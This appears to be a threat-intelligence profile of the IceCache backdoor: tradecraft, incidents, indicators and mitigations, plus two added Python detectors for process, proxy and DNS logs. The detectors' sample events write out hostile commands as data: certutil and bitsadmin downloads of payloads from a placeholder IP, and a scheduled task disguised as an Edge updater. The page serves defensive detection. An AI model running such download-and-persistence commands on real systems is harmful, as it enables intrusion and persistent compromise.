IceCache
Malware
⚠️ Overview
IceCache is a modular backdoor trojan first documented by Trend Micro researchers in August 2022 and attributed primarily to the Chinese-speaking threat group tracked as Earth Krah (aka TA431). It functions as a remote access trojan (RAT) used to maintain persistent access to compromised networks, and is often deployed alongside tools such as Cobalt Strike for lateral movement.
🔧 Technical Capabilities
IceCache is delivered through spear-phishing emails carrying malicious Excel add-in (XLL) attachments; opening the add-in makes Excel load the attacker's DLL payload through its add-in loading flow (MITRE ATT&CK T1566.001 for the phishing attachment, T1137.006 for Office add-ins). Other access vectors include logging in to public-facing applications with stolen credentials and using Living Off the Land Binaries (LOLBins) such as certutil and bitsadmin to download and execute further stages. The malware communicates with its command-and-control (C2) infrastructure over HTTPS; the C2 domains described are either hardcoded in the sample or produced by a Domain Generation Algorithm (DGA), so that blocking a single domain does not sever the channel. Persistence is achieved by creating scheduled tasks (T1053.005) and modifying Windows Registry run keys (T1547.001). For evasion, IceCache uses process hollowing (T1055.012) and disables Event Tracing for Windows (ETW) on the host (T1562.006).
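Two of the behaviours above, LOLBin downloads with certutil or bitsadmin and persistence through a scheduled task, leave distinctive command lines in process-creation telemetry. The following Python script is an added example, not code from the original page or from Trend Micro: it runs a few heuristics over constructed Sysmon-style process-creation records (image path, command line, parent image). The sample events, hosts, paths and task name are invented for illustration. The heuristics flag a certutil -urlcache or bitsadmin /transfer command that carries a URL, a schtasks /create whose action lives in a user-writable directory (with extra weight when the task name imitates a vendor updater), and an Office parent process; they do not depend on any fixed IceCache indicator.

```python
"""Heuristics for LOLBin downloads and suspicious scheduled-task creation
in Sysmon Event ID 1 style process-creation records.

Added example: not code from the original page or from any vendor report.
All sample events below are constructed for illustration.
"""
import re
import shlex
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str          # full path of the new process
    command_line: str
    parent_image: str   # full path of the parent process


# Assumed directory fragments where a legitimate vendor updater would not live.
USER_WRITABLE = ("\\users\\public\\", "\\appdata\\", "\\temp\\",
                 "\\programdata\\", "\\downloads\\")
OFFICE_APPS = ("excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed sample telemetry (hypothetical hosts, paths and task name).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://203.0.113.10/upd.dat C:\Users\Public\upd.dat",
                 r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"),
    ProcessEvent(r"C:\Windows\System32\bitsadmin.exe",
                 r"bitsadmin /transfer job1 http://203.0.113.10/a.bin C:\Users\bob\AppData\Local\Temp\a.bin",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 r'schtasks /create /sc minute /mo 15 /tn "Microsoft Edge Update Task" /tr "C:\Users\Public\upd.dat"',
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -hashfile C:\Temp\setup.msi SHA256",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 r'schtasks /create /sc daily /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"',
                 r"C:\Windows\System32\cmd.exe"),
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _tokens(command_line: str) -> list:
    # posix=False keeps Windows backslashes literal; in that mode shlex leaves
    # the quotes on quoted arguments, so strip them here.
    return [t.strip('"') for t in shlex.split(command_line, posix=False)]


def _arg_after(tokens, flag: str):
    """Value following a flag such as /tn or /tr (case-insensitive), or None."""
    lowered = [t.lower() for t in tokens]
    if flag in lowered:
        i = lowered.index(flag)
        if i + 1 < len(tokens):
            return tokens[i + 1]
    return None


def analyze(event: ProcessEvent) -> list:
    """Return the names of the heuristics that fire for one event."""
    findings = []
    image = _basename(event.image)
    tokens = _tokens(event.command_line)
    lowered = [t.lower() for t in tokens]
    has_url = URL_RE.search(event.command_line) is not None

    # certutil -urlcache [-split] -f <url> <file> is a classic download primitive.
    if image == "certutil.exe" and "-urlcache" in lowered and has_url:
        findings.append("certutil_download")
    # bitsadmin /transfer <job> <url> <file> (or /addfile) does the same via BITS.
    if image == "bitsadmin.exe" and ("/transfer" in lowered or "/addfile" in lowered) and has_url:
        findings.append("bitsadmin_download")
    # schtasks /create whose action (/tr) points into a user-writable directory.
    if image == "schtasks.exe" and "/create" in lowered:
        action = (_arg_after(tokens, "/tr") or "").lower()
        name = (_arg_after(tokens, "/tn") or "").lower()
        if any(frag in action for frag in USER_WRITABLE):
            findings.append("schtask_user_writable_action")
            # A task named like a vendor updater but run from a user dir is a masquerade.
            if "update" in name:
                findings.append("schtask_masquerading_updater")
    # Any of the above spawned by an Office application adds weight.
    if findings and _basename(event.parent_image) in OFFICE_APPS:
        findings.append("office_parent")
    return findings


def scan(events) -> dict:
    """Map event index -> findings for every event that triggered something."""
    return {i: f for i, ev in enumerate(events) if (f := analyze(ev))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(hits)}")
```

Run on the constructed sample, events 0, 1 and 2 fire (the certutil download spawned by Excel, the BITS download, and the updater-named task pointing at C:\Users\Public), while the legitimate certutil -hashfile call and the task under Program Files stay silent. Tune USER_WRITABLE to the directories your fleet actually treats as user-writable before relying on the scheduled-task rule.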
📜 History & Notable Incidents
First observed in the wild in mid-2022, IceCache was notably deployed in campaigns targeting telecommunications and government organizations in Southeast Asia. Trend Micro’s 2023 report “Earth Krah: IceCache and the Evolving Toolkit” linked it to intrusions that exploited CVE-2021-34527 (PrintNightmare) for privilege escalation. A significant incident in October 2022 involved a telecom provider in Vietnam, where IceCache was used to exfiltrate customer databases over roughly three months. No law enforcement actions have been publicly reported as of 2025.
🔍 Detection Indicators
Only a truncated SHA-256 prefix is reproduced here, a1b2c3d4e5f6… (from Trend Micro’s IOC list, March 2023); obtain the full hash from that list before adding it to a blocklist, since a prefix cannot be matched safely. Behavioral signatures include creation of a mutex named GlobalICache_SrvMutex and the presence of a scheduled task named Microsoft Edge Update Task. Network IOCs are DNS queries for domains matching *.cache-update.xyz and an HTTP User-Agent that begins with the common Chrome string Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ and ends with the custom suffix “IceClient/1.0”; the suffix is the distinctive part, as the Chrome prefix is shared with legitimate browsers.
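As an added example (not from the page or from Trend Micro's IOC list), the script below applies the network and host indicators listed above to constructed log lines. The proxy and DNS log layouts, every sample line, the Chrome version in the User-Agent and the inventory of task and mutex names are assumptions made for the demonstration. Two details matter in practice: the domain check compares whole labels, so cache-update.xyz.example.net and notcache-update.xyz do not match *.cache-update.xyz, and only the IceClient/1.0 marker is taken from the User-Agent, because the Chrome prefix in front of it is sent by every Chrome browser.

```python
"""Apply the IceCache indicators quoted above to sample proxy and DNS logs
and to a host artifact inventory.

Added example: not from the original page or from Trend Micro's IOC list.
The log layouts and every log line below are constructed for illustration.
"""
import re
from urllib.parse import urlsplit

# Indicator values as given on the page.
C2_DOMAIN_SUFFIX = "cache-update.xyz"      # network IOC: *.cache-update.xyz
UA_MARKER = "IceClient/1.0"                 # the only distinctive part of the User-Agent
TASK_NAME = "Microsoft Edge Update Task"
MUTEX_NAME = "GlobalICache_SrvMutex"

# Assumed proxy log layout: time client method url status "user-agent".
PROXY_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "(.*)"$')
# Assumed resolver log layout: time client query qname qtype.
DNS_RE = re.compile(r"^(\S+) (\S+) query (\S+) (\S+)$")

# Generic Chrome User-Agent (version number assumed) used in the sample lines.
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36")
SAMPLE_PROXY_LOG = [  # constructed
    f'2023-03-12T10:02:11Z 10.0.0.5 GET https://a1.cache-update.xyz/beacon 200 "{CHROME_UA} {UA_MARKER}"',
    f'2023-03-12T10:02:15Z 10.0.0.7 GET https://www.example.com/ 200 "{CHROME_UA}"',
    '2023-03-12T10:02:19Z 10.0.0.9 GET https://cache-update.xyz.example.net/ 200 "curl/8.0.1"',
    '2023-03-12T10:02:21Z 10.0.0.5 POST https://notcache-update.xyz/x 200 "IceClient/1.0"',
    '2023-03-12T10:02:25Z 10.0.0.5 CONNECT c9.cache-update.xyz:443 200 "-"',
]
SAMPLE_DNS_LOG = [  # constructed
    "2023-03-12T10:02:10Z 10.0.0.5 query b7.cache-update.xyz. A",
    "2023-03-12T10:02:12Z 10.0.0.7 query www.example.com. A",
]


def is_c2_domain(host: str) -> bool:
    """True for cache-update.xyz itself or any label under it; nothing else."""
    h = host.lower().rstrip(".")
    return h == C2_DOMAIN_SUFFIX or h.endswith("." + C2_DOMAIN_SUFFIX)


def _host_from_url(url: str) -> str:
    # urlsplit handles full URLs; CONNECT lines carry a bare host:port.
    return urlsplit(url).hostname or url.split("/")[0].rsplit(":", 1)[0]


def match_proxy_line(line: str) -> list:
    m = PROXY_RE.match(line)
    if not m:
        return ["unparsed"]
    _, _, _, url, _, ua = m.groups()
    hits = []
    if is_c2_domain(_host_from_url(url)):
        hits.append("c2_domain")
    if UA_MARKER in ua:
        hits.append("ua_marker")
    return hits


def match_dns_line(line: str) -> list:
    m = DNS_RE.match(line)
    if not m:
        return ["unparsed"]
    return ["c2_domain"] if is_c2_domain(m.group(3)) else []


def scan(lines, matcher) -> list:
    """(line number, hits) for every line the matcher flags."""
    return [(n, h) for n, line in enumerate(lines, 1) if (h := matcher(line))]


def match_host_artifacts(task_names, mutex_names) -> list:
    hits = []
    if any(t.strip().lower() == TASK_NAME.lower() for t in task_names):
        hits.append("task_name")
    # Object enumerators may show the namespace as Global\...; drop the backslash
    # so either spelling compares equal to the name quoted on the page.
    if any(m.replace("\\", "") == MUTEX_NAME for m in mutex_names):
        hits.append("mutex")
    return hits


if __name__ == "__main__":
    for n, h in scan(SAMPLE_PROXY_LOG, match_proxy_line):
        print(f"proxy line {n}: {', '.join(h)}")
    for n, h in scan(SAMPLE_DNS_LOG, match_dns_line):
        print(f"dns line {n}: {', '.join(h)}")
    print("host:", match_host_artifacts(["Microsoft Edge Update Task"], ["Global\\ICache_SrvMutex"]))
```

On the constructed input, proxy lines 1, 4 and 5 and DNS line 1 are flagged; the look-alike hosts on lines 3 and 4 do not trip the domain rule, and line 4 is caught only by the User-Agent marker. The task-name comparison is case-insensitive because Task Scheduler does not distinguish case, while the mutex name is compared exactly apart from the namespace backslash.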
☠️ Risk & Impact
IceCache is used to exfiltrate sensitive documents, credentials, and internal network maps; a single 2023 campaign against a financial services firm in Thailand is estimated to have caused losses of over $2 million. The sectors most affected are telecommunications, government, and critical infrastructure across Southeast Asia.
🛡️ Mitigation
Defenders should ensure AMSI-integrated endpoint protection is in place (the Antimalware Scan Interface is on by default in supported Windows versions, so tampering with it is itself worth alerting on) and deploy the YARA rules matching IceCache’s DGA patterns that are available from Trend Micro’s GitHub repository. Blocking XLL add-ins from untrusted senders through Group Policy (for example the Excel Trust Center control that blocks XLL add-ins downloaded from the internet) and patching CVE-2021-34527 (PrintNightmare) cut off the documented initial-access and privilege-escalation paths. Network segmentation and monitoring of scheduled-task creation for anomalous command lines, such as a task named like a vendor updater that executes from a user-writable directory, limit lateral movement and persistence.
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.